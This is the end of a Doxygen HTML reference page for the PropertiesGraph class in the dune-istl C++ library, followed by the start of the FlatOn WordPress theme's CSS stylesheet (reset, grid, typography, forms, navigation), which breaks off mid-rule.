href="a00205.html#a440ff33400310293b351b4172356d411">VertexIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::end </td> <td>(</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Get an iterator over the vertices. </p> <dl class="section return"><dt>Returns:</dt><dd>A vertex Iterator positioned behind the last vertex. </dd></dl> </div> </div> <a class="anchor" id="a3ae871750d0ef4be146ab7b6bb8aef47"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a9bacf6679d481b3550c61128b716087d">ConstVertexIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::end </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get an iterator over the vertices. </p> <dl class="section return"><dt>Returns:</dt><dd>A vertex Iterator positioned behind the last vertex. </dd></dl> </div> </div> <a class="anchor" id="a5d1975f07023660d6983d37e2b318121"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a1ce0f1eaa14e3c256b2591bac899f4db">EdgeIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::endEdges </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Get the mutable edge iterator over edges starting at a vertex. </p> <dl class="section return"><dt>Returns:</dt><dd>An edge iterator over edges starting at a vertex positioned after the last edge. </dd></dl> </div> </div> <a class="anchor" id="a9e9557fc3cda72c1bddb3e579eaa966a"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a39d89142505784b2c0b19a879307b7a3">ConstEdgeIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::endEdges </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the mutable edge iterator over edges starting at a vertex. </p> <dl class="section return"><dt>Returns:</dt><dd>An edge iterator over edges starting at a vertex positioned after the last edge. </dd></dl> </div> </div> <a class="anchor" id="a48a8f8cb772902fed871a78feac25204"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::findEdge </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>target</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> <p>Find the descriptor of an edge. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">source</td><td>The source vertex of the edge we search for. </td></tr> <tr><td class="paramname">target</td><td>The target vertex of the edge we search for. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The edge we found or numeric_limits&lt;EdgeIterator&gt;::max() if it does not exist. </dd></dl> </div> </div> <a class="anchor" id="ab5f77ab35caef7e63a8c4444621ea929"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::getEdgeProperties </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>edge</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Get the properties associated with a edge. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">edge</td><td>The descriptor identifying the edge. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The properties of the edge. </dd></dl> </div> </div> <a class="anchor" id="abf5bbf078d6f05c5ed17dc0d929d97e1"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">const <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::getEdgeProperties </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>edge</em></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the properties associated with a edge. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">edge</td><td>The descriptor identifying the edge. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The properties of the edge. </dd></dl> </div> </div> <a class="anchor" id="aa820797ec2e749b48f448809e818ea62"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::getEdgeProperties </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>target</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Get the properties associated with a edge. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">source</td><td>The descriptor identifying the source vertex of the edge. </td></tr> <tr><td class="paramname">target</td><td>The descriptor identifying the target vertex of the edge. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The properties of the edge. </dd></dl> </div> </div> <a class="anchor" id="a8eec13dd8da0a039112ee2ee7cd5cf38"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">const <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::getEdgeProperties </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>target</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the properties associated with a edge. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">source</td><td>The descriptor identifying the source vertex of the edge. </td></tr> <tr><td class="paramname">target</td><td>The descriptor identifying the target vertex of the edge. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The properties of the edge. </dd></dl> </div> </div> <a class="anchor" id="ac7254be6511972118cfcb380377e2ed5"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::getVertexProperties </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>vertex</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Get the properties associated with a vertex. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">vertex</td><td>The descriptor identifying the vertex. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The properties of the vertex. </dd></dl> </div> </div> <a class="anchor" id="a6fa831c8ff39965efc4e05a762621b0d"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">const <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::getVertexProperties </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>vertex</em></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the properties associated with a vertex. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">vertex</td><td>The descriptor identifying the vertex. </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns:</dt><dd>The properties of the vertex. </dd></dl> </div> </div> <a class="anchor" id="a5fc4a922d58efed26ed62b998c4b4331"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">const <a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>&amp; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::graph </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the graph the properties are attached to. </p> <dl class="section return"><dt>Returns:</dt><dd>The underlying graph. </dd></dl> </div> </div> <a class="anchor" id="a691070c63473ad3dda572c26a1660054"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::maxVertex </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the maximal vertex descriptor. </p> <dl class="section return"><dt>Returns:</dt><dd>The minimum value v such that for all vertices w in the graph w&lt;v holds. </dd></dl> </div> </div> <a class="anchor" id="a73afd0dcf2d685539e2989800c2f5fbd"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">std::size_t <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::noEdges </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the number of edges in the graph. </p> </div> </div> <a class="anchor" id="ae33788af99559312f3f5d166382ba9d8"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">std::size_t <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::noVertices </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the number of vertices in the graph. </p> </div> </div> <hr/>The documentation for this class was generated from the following file:<ul> <li><a class="el" href="a00311_source.html">graph.hh</a></li> </ul> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Mon Jun 4 2012 12:02:19 for dune-istl by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.1 </small></address> </body> </html>
wp-content/themes/flaton/style.css
Tamiiy/spartan-english
/* Theme Name: FlatOn Theme URI: http://www.webulousthemes.com/flaton/ Author: N. Venkat Raj Author URI: http://www.webulousthemes.com/ Description: FlatOn is inspired by flat design trend and comes with modern and responsive design. Also has two different color schemes. It uses skeleton framework for grids which keeps minimal css. Stylesheet is generated using SASS and so stays DRY. Best suited for Corporate/Business/Blog sites and also support Jigoshop eCommerce. Supports theme options panel and comes with lots of options. Has 4 Footer Widget Areas, allows Custom CSS via theme option panel. Demo: http://demo.webulous.in/flaton Version: 1.1.7 License: GNU General Public License v2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Text Domain: flaton Tags: custom-background, custom-header, custom-menu, featured-images, post-formats, responsive-layout, right-sidebar, left-sidebar, sticky-post, threaded-comments, translation-ready, two-columns This theme, like WordPress, is licensed under the GPL. Use it to make something cool, have fun, and share what you've learned with others. Resetting and rebuilding styles have been helped along thanks to the fine work of Eric Meyer http://meyerweb.com/eric/tools/css/reset/index.html along with Nicolas Gallagher and Jonathan Neal http://necolas.github.com/normalize.css/ and Blueprint http://www.blueprintcss.org/ */ /*-------------------------------------------------------------- >>> TABLE OF CONTENTS: ---------------------------------------------------------------- 0.0 Reset 1.0 Grid 2.0 Typography 3.0 Elements 4.0 Forms 5.0 Navigation 5.1 Links 5.2 Menus 6.0 Accessibility 7.0 Alignments 8.0 Clearings 9.0 Widgets 10.0 Content 10.1 Posts and pages 10.2 Asides 10.3 Comments 11.0 Infinite scroll 12.0 Media 12.1 Captions 12.2 Galleries --------------------------------------------------------------*/ /*-------------------------------------------------------------- 0.0 Reset --------------------------------------------------------------*/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { border: 0; font-family: inherit; font-size: 100%; font-style: inherit; font-weight: inherit; margin: 0; outline: 0; padding: 0; vertical-align: baseline; } html { font-size: 62.5%; /* Corrects text resizing oddly in IE6/7 when body font-size is set using em units http://clagnut.com/blog/348/#c790 */ overflow-y: scroll; /* Keeps page centered in all browsers regardless of content height */ -webkit-text-size-adjust: 100%; /* Prevents iOS text size adjust after orientation change, without disabling user zoom */ -ms-text-size-adjust: 100%; /* www.456bereastreet.com/archive/201012/controlling_text_size_in_safari_for_ios_without_disabling_user_zoom/ */ } *, *:before, *:after { /* apply a natural box layout model to all elements; see http://www.paulirish.com/2012/box-sizing-border-box-ftw/ */ -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } body { background: #FFFFFF; /* Fallback for when there is no custom background color defined. */ } article, aside, details, figcaption, figure, footer, header, main, nav, section { display: block; } /*ol, ul { list-style: none; }*/ table { /* tables still need 'cellspacing="0"' in the markup */ border-collapse: separate; border-spacing: 0; } caption, th, td { font-weight: normal; text-align: left; } blockquote:before, blockquote:after, q:before, q:after { content: ""; } blockquote, q { quotes: "" ""; } a:focus { outline: thin dotted; } a:hover, a:active { outline: 0; } a img { border: 0; } /*-------------------------------------------------------------- 1.0 Grid --------------------------------------------------------------*/ .container { position: relative; width: 93%; max-width: 1170px; margin: 0 auto; padding: 0; } .container .one.column { width: 4.1%; } .container .two.columns { width: 10.4%; } .container .three.columns { width: 16.6%; } .container .four.columns { width: 22.9%; } .container .five.columns { width: 29.16%; } .container .six.columns { width: 35%; } .container .seven.columns { width: 41.6%; } .container .eight.columns { width: 47.9%; } .container .nine.columns { width: 54.16%; } .container .ten.columns { width: 60%; } .container .eleven.columns { width: 66.66%; } .container .twelve.columns { width: 72.9%; } .container .thirteen.columns { width: 79.16%; } .container .fourteen.columns { width: 85%; } .container .fifteen.columns { width: 91.66%; } .container .sixteen.columns { width: 97.9%; } .container .one-third.column { width: 31.25%; } .container .tow-thirds.column { width: 64.5%; } .container .offset-by-one { padding-left: 6.25%; } .container .offset-by-two { padding-left: 12.5%; } .container .offset-by-three { padding-left: 18.75%; } .container .offset-by-four { padding-left: 25%; } .container .offset-by-five { padding-left: 31.25%; } .container .offset-by-six { padding-left: 37.5%; } .container .offset-by-seven { padding-left: 43.7%; } .container .offset-by-eight { padding-left: 50%; } .container .offset-by-nine { padding-left: 56.25%; } .container .offset-by-ten { padding-left: 62.5%; } .container .offset-by-eleven { padding-left: 68.75%; } .container .offset-by-twelve { padding-left: 75%; } .container .offset-by-thirteen { padding-left: 81.25%; } .container .offset-by-fourteen { padding-left: 87.5%; } .container .offset-by-fifteen { padding-left: 93.75%; } .column, .columns { float: left; display: inline; margin-left: 1%; margin-right: 1%; } .column .alpha, .columns .alpha { margin-left: 0; } .column .omega, .columns .omega { margin-right: 0; } .row { margin-bottom: 2%; } @media only screen and (min-width: 768px) and (max-width: 959px) { .container { width: 93%; } .container .column, .container .columns { margin-left: 1.3%; margin-right: 1.3%; } .container .column .alpha, .container .columns .alpha { margin-left: 0; margin-right: 1.3%; } .container .column .omega, .container .columns .omega { margin-left: 1.3%; margin-right: 0%; } .container .one.column { width: 3.64%; } .container .two.columns { width: 9.89%; } .container .three.columns { width: 16.1%; } .container .four.columns { width: 22.39%; } .container .five.columns { width: 28.64%; } .container .six.columns { width: 34.89%; } .container .seven.columns { width: 41.14%; } .container .eight.columns { width: 47.39%; } .container .nine.columns { width: 53.64%; } .container .ten.columns { width: 59.89%; } .container .eleven.columns { width: 66.14%; } .container .twelve.columns { width: 72.39%; } .container .thirteen.columns { width: 78.64%; } .container .fourteen.columns { width: 84.89%; } .container .fifteen.columns { width: 91.14%; } .container .sixteen.columns { width: 97.39%; } .container .one-third.column { width: 30.72%; } .container .two-thirds.column { width: 64%; } .container .offset-by-one { padding-left: 6.25%; } .container .offset-by-two { padding-left: 12.5%; } .container .offset-by-three { padding-left: 18.75%; } .container .offset-by-four { padding-left: 25%; } .container .offset-by-five { padding-left: 31.25%; } .container .offset-by-six { padding-left: 37.5%; } .container .offset-by-seven { padding-left: 43.75%; } .container .offset-by-eight { padding-left: 45%; } .container .offset-by-nine { padding-left: 56.25%; } .container .offset-by-ten { padding-left: 62.5%; } .container .offset-by-eleven { padding-left: 68.75%; } .container .offset-by-twelve { padding-left: 75%; } .container .offset-by-thirteen { padding-left: 81.25%; } .container .offset-by-fourteen { padding-left: 87.5%; } .container .offset-by-fifteen { padding-left: 93.75%; } } @media only screen and (max-width: 767px) { .container { width: 93%; } .container .one.column, .container .two.columns, .container .three.columns, .container .four.columns, .container .five.columns, .container .six.columns, .container .seven.columns, .container .eight.columns, .container .nine.columns, .container .ten.columns, .container .eleven.columns, .container .twelve.columns, .container .thirteen.columns, .container .fourteen.columns, .container .fifteen.columns, .container .sixteen.columns, .container .one-third.column, .container .two-thirds.column { width: 100%; } .container .offset-by-one, .container .offset-by-two, .container .offset-by-three, .container .offset-by-four, .container .offset-by-five, .container .offset-by-six, .container .offset-by-seven, .container .offset-by-eight, .container .offset-by-nine, .container .offset-by-ten, .container .offset-by-eleven, .container .offset-by-twelve, .container .offset-by-thirteen, .container .offset-by-fourteen, .container .offset-by-fifteen { padding-left: 0; } .columns, .column { margin: 0; } } @media only screen and (min-width: 480px) and (max-width: 767px) { .container { width: 93%; } .container .one.column, .container .two.columns, .container .three.columns, .container .four.columns, .container .five.columns, .container .six.columns, .container .seven.columns, .container .eight.columns, .container .nine.columns, .container .ten.columns, .container .eleven.columns, .container .twelve.columns, .container .thirteen.columns, .container .fourteen.columns, .container .fifteen.columns, .container .sixteen.columns, .container .one-third.column, .container .two-thirds.column { width: 100%; } .columns, .column { margin: 0; } } /* #Clearing ================================================== */ /* Self Clearing Goodness */ .container:after { content: "\0020"; display: block; height: 0; clear: both; visibility: hidden; } /* Use clearfix class on parent to clear nested columns, or wrap each row of columns in a <div class="row"> */ .clearfix:before, .clearfix:after, .row:before, .row:after, .panel-row-style-full-width-layout:before, .panel-row-style-full-width-layout:after, .panel-row-style-section-divider:before, .panel-row-style-section-divider:after { content: '\0020'; display: block; overflow: hidden; visibility: hidden; width: 0; height: 0; } .row:after, .clearfix:after, .panel-row-style-full-width-layout:before, .panel-row-style-full-width-layout:after, .panel-row-style-section-divider:before, .panel-row-style-section-divider:after { clear: both; } .row, .clearfix { zoom: 1; } /* You can also use a <br class="clear" /> to clear columns */ .clear { clear: both; display: block; overflow: hidden; visibility: hidden; width: 0; height: 0; } /* ==|== primary styles ===================================================== Author: Lucas - Skeleton Based Media Queries ========================================================================== */ /* Smaller than standard 960 (devices and browsers) */ /* Tablet Portrait size to standard 960 (devices and browsers) */ /* All Mobile Sizes (devices and browser) */ /* Mobile Landscape Size to Tablet Portrait (devices and browsers) */ /* Mobile Portrait Size to Mobile Landscape Size (devices and browsers) */ /*-------------------------------------------------------------- 2.0 Typography --------------------------------------------------------------*/ body, button, input, select, textarea { color: #34495E; font-family: "Source Sans Pro", sans-serif; font-size: 16px; font-size: 1.6rem; line-height: 1.5; } h1, h2, h3, h4, h5, h6 { clear: both; font-family: "Bitter", serif; font-weight: 700; } h1 { font-size: 40px; font-size: 4rem; } h2 { font-size: 30px; font-size: 3rem; } h3 { font-size: 22px; font-size: 2.2rem; } h4 { font-size: 20px; font-size: 2rem; } h5 { font-size: 18px; font-size: 1.8rem; } h6 { font-size: 16px; font-size: 1.6rem; } p { margin-bottom: 1.5em; } b, strong { font-weight: bold; } dfn, cite, em, i { font-style: italic; } blockquote { margin: 0 1.5em; } address { margin: 0 0 1.5em; } pre { background: #F5F5F5; font-family: "Courier 10 Pitch", Courier, monospace; font-size: 15px; font-size: 1.5rem; line-height: 1.6; margin-bottom: 1.6em; max-width: 100%; overflow: auto; padding: 1.6em; border: 1px solid #ECF0F1; } code, kbd, tt, var { font-size: 15px; font-size: 1.5rem; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; } abbr, acronym { border-bottom: 1px dotted #34495E; cursor: help; } mark, ins { background: #b9c8d8; text-decoration: none; } sup, sub { font-size: 75%; height: 0; line-height: 0; position: relative; vertical-align: baseline; } sup { bottom: 1ex; } sub { top: .5ex; } small { font-size: 75%; } big { font-size: 125%; } /*-------------------------------------------------------------- 3.0 Elements --------------------------------------------------------------*/ hr { background-color: #ECF0F1; border: 0; height: 1px; margin-bottom: 1.5em; } ul, ol { margin: 0 0 1.5em 3em; } /*ul { list-style: disc; } ol { list-style: decimal; }*/ li > ul, li > ol { margin-bottom: 0; margin-left: 1.5em; } dt { font-weight: bold; } dd { margin: 0 1.5em 1.5em; } img { height: auto; /* Make sure images are scaled correctly. */ max-width: 100%; /* Adhere to container width. */ } figure { margin: 0; } table { width: 100%; border-spacing: 0; margin: 0 0 1.5em; border-collapse: separate; border: 1px solid #ECF0F1; } table th { font-weight: bold; } table caption, table td, table th { text-align: center; padding: 5px; } table td, table th { border: 1px solid #ECF0F1; border-top: 0; border-right: 0; } table td#today { background-color: #3498db; color: #FFFFFF; } table { border-left: 0; border-bottom: 0; } /*-------------------------------------------------------------- 4.0 Forms --------------------------------------------------------------*/ button, input, select, textarea { font-size: 100%; /* Corrects font size not being inherited in all browsers */ margin: 0; /* Addresses margins set differently in IE6/7, F3/4, S5, Chrome */ vertical-align: baseline; /* Improves appearance and consistency in all browsers */ } button, input[type="button"], input[type="reset"], input[type="submit"] { background: #3498db; color: #FFFFFF; cursor: pointer; /* Improves usability and consistency of cursor style between image-type 'input' and others */ -webkit-appearance: button; /* Corrects inability to style clickable 'input' types in iOS */ line-height: 1; padding: 7px 10px; border: 0; -webkit-transition: background-color 1s ease; -moz-transition: background-color 1s ease; -ms-transition: background-color 1s ease; -o-transition: background-color 1s ease; transition: background-color 1s ease; } button:hover, input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover { background-color: #34495E; } button:focus, input[type="button"]:focus, input[type="reset"]:focus, input[type="submit"]:focus, button:active, input[type="button"]:active, input[type="reset"]:active, input[type="submit"]:active { border-color: #34495E; } input[type="checkbox"], input[type="radio"] { padding: 0; /* Addresses excess padding in IE8/9 */ } input[type="search"] { -webkit-appearance: textfield; /* Addresses appearance set to searchfield in S5, Chrome */ -webkit-box-sizing: content-box; /* Addresses box sizing set to border-box in S5, Chrome (include -moz to future-proof) */ -moz-box-sizing: content-box; box-sizing: content-box; } input[type="search"]::-webkit-search-decoration { /* Corrects inner padding displayed oddly in S5, Chrome on OSX */ -webkit-appearance: none; } button::-moz-focus-inner, input::-moz-focus-inner { /* Corrects inner padding and border displayed oddly in FF3/4 www.sitepen.com/blog/2008/05/14/the-devils-in-the-details-fixing-dojos-toolbar-buttons/ */ border: 0; padding: 0; } input[type="text"], input[type="email"], input[type="url"], input[type="password"], input[type="search"], textarea { color: #6D6D6D; border: 1px solid #ECF0F1; background-clip: padding-box; /* stops bg color from leaking outside the border: */ -webkit-border-radius: 3px; border-radius: 3px; } input[type="text"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="password"]:focus, input[type="search"]:focus, textarea:focus { color: #6D6D6D; } input[type="text"], input[type="email"], input[type="url"], input[type="password"], input[type="search"] { padding: 3px; } textarea { overflow: auto; /* Removes default vertical scrollbar in IE6/7/8/9 */ padding-left: 3px; vertical-align: top; /* Improves readability and alignment in all browsers */ width: 100%; } /*-------------------------------------------------------------- 5.0 Navigation --------------------------------------------------------------*/ /*-------------------------------------------------------------- 5.1 Links --------------------------------------------------------------*/ a { color: #3498db; text-decoration: none; } a:visited { color: #3498db; } a:hover, a:focus, a:active { color: #196090; -webkit-transition: color 0.5s ease; -moz-transition: color 0.5s ease; -ms-transition: color 0.5s ease; -o-transition: color 0.5s ease; transition: color 0.5s ease; } /*-------------------------------------------------------------- 5.2 Menus --------------------------------------------------------------*/ .main-navigation { clear: both; display: block; float: left; width: 100%; } .main-navigation ul { list-style: none; margin: 0; padding-left: 0; } .main-navigation ul ul { box-shadow: 0 3px 3px rgba(0, 0, 0, 0.2); background-color: #34495E; float: left; position: absolute; top: 57px; left: -999em; z-index: 99999; } .main-navigation ul ul ul { left: -999em; top: 0; } .main-navigation ul ul li { line-height: 40px; } .main-navigation ul ul li:hover > ul { left: 100%; } .main-navigation ul ul a { width: 300px; border-left: 5px solid transparent; padding-left: 15px; } .main-navigation ul ul :hover > a { padding-left: 25px; -webkit-transition: padding 0.5s ease; -moz-transition: padding 0.5s ease; -ms-transition: padding 0.5s ease; -o-transition: padding 0.5s ease; transition: padding 0.5s ease; } .main-navigation ul ul a:hover { border-color: #1aace7; } .main-navigation ul li:hover > ul { left: auto; } .main-navigation li { float: left; position: relative; line-height: 57px; } .main-navigation li:hover > a { background-color: #3498db; } .main-navigation a { display: block; text-decoration: none; padding: 0 25px; color: #FFFFFF; } .main-navigation .current_page_item a, .main-navigation .current-menu-item a { background-color: #3498db; } /* Small menu */ .menu-toggle { display: none; } @media screen and (max-width: 600px) { .menu-toggle, .main-navigation.toggled .nav-menu { display: block !important; padding: 15px 0; margin: 5px 0; width: 100%; } .main-navigation li { float: none; line-height: 40px; } .main-navigation li ul { display: block; top: 40px; } .main-navigation ul ul li:hover > ul { left: 25px; } .main-navigation ul { display: none; } } .comment-navigation .nav-previous a, .paging-navigation .nav-previous a, .post-navigation .nav-previous a, .comment-navigation .nav-next a, .paging-navigation .nav-next a, .post-navigation .nav-next a, .page-links a, .more-link { display: inline-block; background-color: #3498db; color: #FFFFFF; padding: 7px 10px; -webkit-transition: background-color 1s ease; -moz-transition: background-color 1s ease; -ms-transition: background-color 1s ease; -o-transition: 